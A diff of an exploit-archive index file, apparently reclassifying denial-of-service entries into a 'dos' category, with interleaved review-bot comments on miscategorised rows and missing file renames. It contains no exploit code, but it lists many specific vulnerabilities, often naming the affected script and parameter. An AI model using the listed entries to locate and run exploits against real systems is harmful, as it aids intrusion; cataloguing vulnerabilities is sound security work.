 24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x About.HTML HTML Injection Vulnerability",2004-09-17,ViperSV,windows,remote,0
 24608,platforms/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
 24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 Insecure Temporary File Creation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
-24610,platforms/multiple/webapps/24610.txt,"DNS4Me 3.0 - Denial of Service And Cross-Site Scripting Vulnerabilities",2004-09-17,"James Bercegay",multiple,webapps,0
+24610,platforms/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service And Cross-Site Scripting Vulnerabilities",2004-09-17,"James Bercegay",multiple,dos,0
 24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 Administrator Command Execution Vulnerability",2004-09-17,"GulfTech Security",cgi,webapps,0
 24612,platforms/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 YaBB.pl IMSend Cross-Site Scripting Vulnerability",2004-09-17,"GulfTech Security",cgi,webapps,0
 24613,platforms/php/webapps/24613.txt,"ReMOSitory SQL Injection Vulnerability",2004-09-18,khoaimi,php,webapps,0
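Review bot: Moving 24610 to `platforms/multiple/dos/` with type `dos` files an advisory that also carries a Cross-Site Scripting issue under the weaker of its two findings, so anyone filtering the index on `webapps` for web-facing bugs no longer sees it. The index allows one type per row; when a file mixes categories the higher-impact or web-facing finding is the safer primary classification, which here means leaving `24610,platforms/multiple/webapps/24610.txt,"DNS4Me 3.0 - Denial of Service And Cross-Site Scripting Vulnerabilities",2004-09-17,"James Bercegay",multiple,webapps,0` as it was. If the rule being applied is "any DoS in the title goes to dos", that convention deserves a note in the repository so later mixed advisories are filed the same way.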
@@ -21782,20 +21782,20 @@ id,file,description,date,author,platform,type,port
 24616,platforms/php/webapps/24616.txt,"TUTOS file_overview.php link_id Parameter SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0
 24617,platforms/php/webapps/24617.txt,"TUTOS app_new.php t Parameter XSS",2004-09-20,"Joxean Koret",php,webapps,0
 24618,platforms/windows/dos/24618.c,"Impressions Games Lords of the Realm III Nickname Remote Denial of Service Vulnerability",2004-09-20,"Luigi Auriemma",windows,dos,0
-24619,platforms/cgi/webapps/24619.txt,"EmuLive Server4 - Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,webapps,0
+24619,platforms/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,dos,0
 24620,platforms/windows/dos/24620.c,"LeadMind Pop Messenger 1.60 Illegal Character Remote Denial of Service Vulnerability",2004-09-21,"Luigi Auriemma",windows,dos,0
-24621,platforms/php/webapps/24621.txt,"Pinnacle ShowCenter 1.51 Web Interface Skin Denial of Service Vulnerability",2004-09-21,"Marc Ruef",php,webapps,0
+24621,platforms/php/dos/24621.txt,"Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service Vulnerability",2004-09-21,"Marc Ruef",php,dos,0
 24622,platforms/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow Vulnerability",2004-09-21,"D. J. 
Bernstein",linux,remote,0
-24623,platforms/windows/remote/24623.txt,"Sophos Anti-Virus 3.x Reserved MS-DOS Name Scan Evasion Vulnerability",2004-09-22,"Kurt Seifried",windows,remote,0
+24623,platforms/windows/remote/24623.txt,"Sophos Anti-Virus 3.x - Reserved MS-DOS Name Scan Evasion Vulnerability",2004-09-22,"Kurt Seifried",windows,remote,0
 24624,platforms/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server Multiple Command Remote Overflow",2004-09-16,D_BuG,windows,remote,0
 24625,platforms/asp/webapps/24625.txt,"FreezingCold Broadboard search.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0
 24626,platforms/asp/webapps/24626.txt,"FreezingCold Broadboard profile.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0
 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0
 24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0
 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0
-24635,platforms/windows/remote/24635.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2)",2004-09-27,Coolio,windows,remote,0
-24636,platforms/windows/remote/24636.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3)",2004-09-27,"Ken Hollis",windows,remote,0
-24637,platforms/windows/remote/24637.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4)",2004-09-27,"Ken Hollis",windows,remote,0
+24635,platforms/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service Vulnerability (2)",2004-09-27,Coolio,windows,dos,0
+24636,platforms/windows/dos/24636.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service Vulnerability (3)",2004-09-27,"Ken Hollis",windows,dos,0
+24637,platforms/windows/dos/24637.c,"Microsoft Windows XP - TCP 
Packet Fragmentation Handling Denial of Service Vulnerability (4)",2004-09-27,"Ken Hollis",windows,dos,0
 24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Include Vulnerability",2004-09-27,"Himeur Nourredine",php,webapps,0
 24639,platforms/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1)",2004-09-28,"securma massine",windows,dos,0
 24640,platforms/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2)",2004-09-28,"Sebastien Tricaud",windows,dos,0
@@ -21857,7 +21857,7 @@ id,file,description,date,author,platform,type,port
 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0
 24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0
 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0
-24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0
+24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 - DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0
 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service Vulnerability",2004-10-22,HexView,windows,dos,0
 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script Information Disclosure Vulnerability",2004-10-22,ls,cgi,webapps,0
 24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Remote Cross-Site Scripting And Connection Proxy Vulnerabilities",2004-10-25,"Joxean Koret",multiple,remote,0
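Review bot: Row 24619 (EmuLive Server4) is reclassified from `webapps` to `dos` although its description leads with an Authentication Bypass, a more severe finding than the DoS it is bundled with; under `dos` the bypass is effectively hidden from anyone browsing or grepping the index by type. Unless 24619.txt contains only the DoS, the row is better kept as `24619,platforms/cgi/webapps/24619.txt,"EmuLive Server4 - Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,webapps,0`, with the file left in its current directory. The other rows changed in this hunk (24621, 24623, 24635–24637) are consistent with the rest of the commit.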
@@ -22410,7 +22410,7 @@ id,file,description,date,author,platform,type,port
 25265,platforms/php/webapps/25265.txt,"phpSysInfo 2.0/2.3 index.php sensor_program Parameter XSS",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
 25266,platforms/php/webapps/25266.txt,"phpSysInfo 2.0/2.3 system_footer.php Multiple Parameter XSS",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
 25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 HTML Injection Vulnerability",2005-03-23,"Woody Hughes",php,webapps,0
-25268,platforms/windows/local/25268.txt,"Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability",2005-03-23,"Juha-Matti Laurio",windows,local,0
+25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - TSShutdn.exe Remote Denial of Service Vulnerability",2005-03-23,"Juha-Matti Laurio",windows,dos,0
 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0
 25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 Calendar_Scheduler.PHP Cross-Site Scripting Vulnerability",2004-03-24,"Alberto Trivero",php,webapps,0
 25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 main.php Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0
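Review bot: Row 25268's `file` path moves from `platforms/windows/local/` to `platforms/windows/dos/` and its `type` column from `local` to `dos`, but this index-only diff cannot show whether the exploit file itself was renamed in the same commit; if the rename is missing, the index points at a path that no longer exists in the tree. The same check applies to the other path/type moves in this commit (25692, 26248, 26336, 26382, 26489, 26690, 27258, 27775, 28227, 29683, 30104, 30308, 30430, 30688, 30744, 30753, 30756, 30895, 32362, 32688, 32769, 33707, 33737). A consistency check that the third segment of each `file` path equals the row's `type` column and that each listed path exists on disk would catch a partial move before it lands.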
@@ -22836,7 +22836,7 @@ id,file,description,date,author,platform,type,port
 25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple Index.PHP Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0
 25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 ID Parameter SQL Injection Vulnerability",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0
 25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0
-25692,platforms/multiple/remote/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0
+25692,platforms/multiple/dos/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service Vulnerability",2005-05-23,"Luigi Auriemma",multiple,dos,0
 25693,platforms/php/webapps/25693.txt,"GForge 3.x - Remote Arbitrary Command Execution Vulnerability",2005-05-24,"Filippo Spike Morelli",php,webapps,0
 25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 results.stm indexname XSS",2005-05-24,"Jamie Fisher",windows,remote,0
 25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 logout RCredirect XSS",2005-05-24,"Jamie Fisher",windows,remote,0
@@ -23397,7 +23397,7 @@ id,file,description,date,author,platform,type,port
 26245,platforms/windows/local/26245.py,"Winamp 5.12 - (.m3u) Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0
 26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass Vulnerability",2013-06-17,Chako,php,webapps,0
 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.PHP SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0
-26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0
+26248,platforms/linux/dos/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,dos,0
 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service Vulnerability",2005-09-09,Shiraishi.M,linux,dos,0
 26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0
 26251,platforms/linux/dos/26251.c,"Snort 2.x PrintTcpOptions Remote Denial of Service Vulnerability",2005-09-12,"VulnFact Security Labs",linux,dos,0
@@ -23468,7 +23468,7 @@ id,file,description,date,author,platform,type,port
 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 IFRAME Handling Denial of Service Vulnerability",2005-10-05,"Tom Ferris",multiple,dos,0
 26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - Search.PHP SQL Injection Vulnerability",2005-10-06,trueend5,php,webapps,0
 26335,platforms/asp/webapps/26335.txt,"Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0
-26336,platforms/multiple/remote/26336.txt,"Oracle Forms Servlet TLS Listener Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,remote,0
+26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,dos,0
 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0
 26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 newmsg.php fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0
 26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 footer.php t_login Parameter XSS",2005-10-08,retrogod@aliceposta.it,php,webapps,0
@@ -23514,7 +23514,7 @@ id,file,description,date,author,platform,type,port
 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory recommend.php entryID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
-26382,platforms/linux/local/26382.c,"Linux Kernel 2.6.x - IPV6 - Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,local,0
+26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,dos,0
 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.PHP HTML Injection Vulnerability",2005-10-22,sikikmail,php,webapps,0
 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.PHP Multiple Remote File Include Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0
 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x Index.PHP Cross-Site Scripting Vulnerability",2005-10-26,alex@aleksanet.com,php,webapps,0
@@ -23620,7 +23620,7 @@ id,file,description,date,author,platform,type,port
 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 Error Page XSS",2005-11-09,"Leandro Meiners",php,webapps,0
 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS",2005-11-09,"Leandro Meiners",php,webapps,0
 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection Vulnerability",2005-11-09,"Leandro Meiners",php,webapps,0
-26489,platforms/linux/local/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rémi Denis-Courmont",linux,local,0
+26489,platforms/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rémi Denis-Courmont",linux,dos,0
 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",php,webapps,0
 26491,platforms/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",windows,remote,0
 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution Vulnerability",2002-12-31,"Georgi Guninski",linux,local,0
@@ -23820,7 +23820,7 @@ id,file,description,date,author,platform,type,port
 26687,platforms/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injection Vulnerabilities",2005-12-01,lwang,php,webapps,0
 26688,platforms/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection Vulnerability",2005-12-01,r0t,php,webapps,0
 26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 Session.PHP SQL Injection Vulnerability",2005-12-01,Siegfried,php,webapps,0
-26690,platforms/windows/local/26690.c,"Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability",2005-12-01,"Nima Salehi",windows,local,0
+26690,platforms/windows/dos/26690.c,"Microsoft Windows 2000/2003/XP - CreateRemoteThread Local Denial of Service Vulnerability",2005-12-01,"Nima Salehi",windows,dos,0
 26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 Layers_Toggle.PHP HTTP Response Splitting Vulnerability",2005-12-01,lwang,php,webapps,0
 26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 Extremesearch.PHP Cross-Site Scripting Vulnerability",2005-12-01,r0t,php,webapps,0
 26693,platforms/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module SQL Injection Vulnerability",2005-12-01,"David Maciejak",php,webapps,0
@@ -24386,7 +24386,7 @@ id,file,description,date,author,platform,type,port
 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0
 27256,platforms/php/webapps/27256.txt,"RunCMS 1.x Ratefile.PHP Cross-Site Scripting Vulnerability",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0
 27257,platforms/linux/dos/27257.html,"Multiple Mozilla Products IFRAME JavaScript Execution Vulnerabilit",2006-02-22,"Georgi Guninski",linux,dos,0
-27258,platforms/asp/webapps/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service Vulnerability",2006-02-22,"Josh Zlatin-Amishav",asp,webapps,0
+27258,platforms/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service Vulnerability",2006-02-22,"Josh Zlatin-Amishav",asp,dos,0
 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0
 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection Vulnerability",2006-02-22,trueend5,php,webapps,0
 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Include Vulnerability",2006-02-22,trueend5,php,webapps,0
@@ -24883,7 +24883,7 @@ id,file,description,date,author,platform,type,port
 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0
 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0
 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,webapps,0
-27775,platforms/hardware/webapps/27775.py,"Netgear ProSafe - Denial of Service Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,webapps,0
+27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,dos,0
 27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",2013-08-22,metasploit,linux,webapps,443
 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal Vulnerability",2013-08-22,"High-Tech Bridge SA",windows,webapps,0
 27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow Vulnerability",2013-08-22,x90c,linux,dos,139
@@ -25293,7 +25293,7 @@ id,file,description,date,author,platform,type,port
 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0
 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0
 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 PPT File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0
-28227,platforms/windows/local/28227.txt,"Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability",2006-07-15,"David Matousek",windows,local,0
+28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service Vulnerability",2006-07-15,"David Matousek",windows,dos,0
 28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 CreateRemoteThread Denial of Service Vulnerability",2006-07-15,"David Matousek",hardware,dos,0
 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Include Vulnerabilities",2006-07-17,"Tan Chew Keong",php,webapps,0
 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers UPNP Buffer Overflow Vulnerability",2006-07-17,"Barnaby Jack",hardware,dos,0
@@ -25886,7 +25886,7 @@ id,file,description,date,author,platform,type,port
 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0
 28841,platforms/php/webapps/28841.txt,"RMSOFT Gallery System 2.0 Images.PHP Cross-Site Scripting Vulnerability",2006-10-23,FREAK_PR,php,webapps,0
 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 Cat Parameter Cross-Site Scripting Vulnerability",2006-10-23,MC.Iglo,php,webapps,0
-28843,platforms/php/webapps/28843.txt,"cPanel 10.9 DoSetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0
+28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - DoSetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0
 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 editzonetemplate template Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0
 28845,platforms/php/webapps/28845.txt,"Shop-Script Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0
 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x Waka.PHP Multiple HTML-Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0
@@ -26182,7 +26182,7 @@ id,file,description,date,author,platform,type,port
 29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 view_print.asp id Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0
 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0
 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 reply.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0
-29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0
+29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0
 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 Users.Profile.Inc.PHP SQL Injection Vulnerability",2006-11-21,"Mustafa Can Bjorn",php,webapps,0
 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 show_news.php Query String XSS",2006-11-21,"Alireza Hassani",php,webapps,0
 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0
@@ -26589,7 +26589,7 @@ id,file,description,date,author,platform,type,port
 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.PHP Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0
 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.PHP Local File Include Vulnerability",2007-02-26,"D. Matscheko",php,webapps,0
 29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 - Post.PHP Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0
-29683,platforms/linux/local/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,local,0
+29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,dos,0
 29684,platforms/php/webapps/29684.txt,"Wordpress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0
 29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection Vulnerability",2007-02-27,SaMuschie,windows,remote,0
 29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader <= 7.0.9 - Information Disclosure Vulnerability",2007-02-28,pdp,windows,remote,0
@@ -27145,7 +27145,7 @@ id,file,description,date,author,platform,type,port
 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.PHP SQL Injection Vulnerability",2007-05-29,"laurent gaffie",php,webapps,0
 30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.PHP Pheap_Login Authentication Bypass Vulnerability",2007-05-30,Silentz,php,webapps,0
 30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.PHP SQL Injection Vulnerability",2007-03-16,Serapis.net,php,webapps,0
-30104,platforms/windows/remote/30104.nasl,"F-Secure Policy Manager 7.00 FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,remote,0
+30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,dos,0
 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0
 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0
 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080
@@ -27245,7 +27245,7 @@ id,file,description,date,author,platform,type,port
 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection Vulnerability",2007-07-26,"Aria-Security Team",php,webapps,0
 30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.PHP Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0
 30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,metasploit,windows,local,0
-30308,platforms/windows/local/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,local,0
+30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0
 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0
 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0
 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0
@@ -27328,7 +27328,7 @@ id,file,description,date,author,platform,type,port
 30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection Vulnerability",2007-07-28,"Aria-Security Team",asp,webapps,0
 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog SQL Injection Vulnerability",2007-07-28,"Aria-Security Team",asp,webapps,0
 30429,platforms/php/webapps/30429.txt,"phpCoupon Remote Payment Bypass Vulnerability",2007-07-28,freeprotect.net,php,webapps,0
-30430,platforms/linux/remote/30430.txt,"Fail2ban <= 0.8 - Remote Denial of Service Vulnerability",2007-07-28,"Daniel B. Cid",linux,remote,0
+30430,platforms/linux/dos/30430.txt,"Fail2ban <= 0.8 - Remote Denial of Service Vulnerability",2007-07-28,"Daniel B. Cid",linux,dos,0
 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 BaiduBar.DLL ActiveX Control Remote Code Execution Vulnerability",2007-07-29,cocoruder,windows,remote,0
 30432,platforms/novell/remote/30432.txt,"Novell GroupWise 6.5 WebAccess User.Id Parameter Cross-Site Scripting Vulnerability",2007-07-30,0x000000,novell,remote,0
 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 lang-en.php wndtitle Parameter XSS",2007-07-30,"Aria-Security Team",php,webapps,0
@@ -27639,7 +27639,7 @@ id,file,description,date,author,platform,type,port
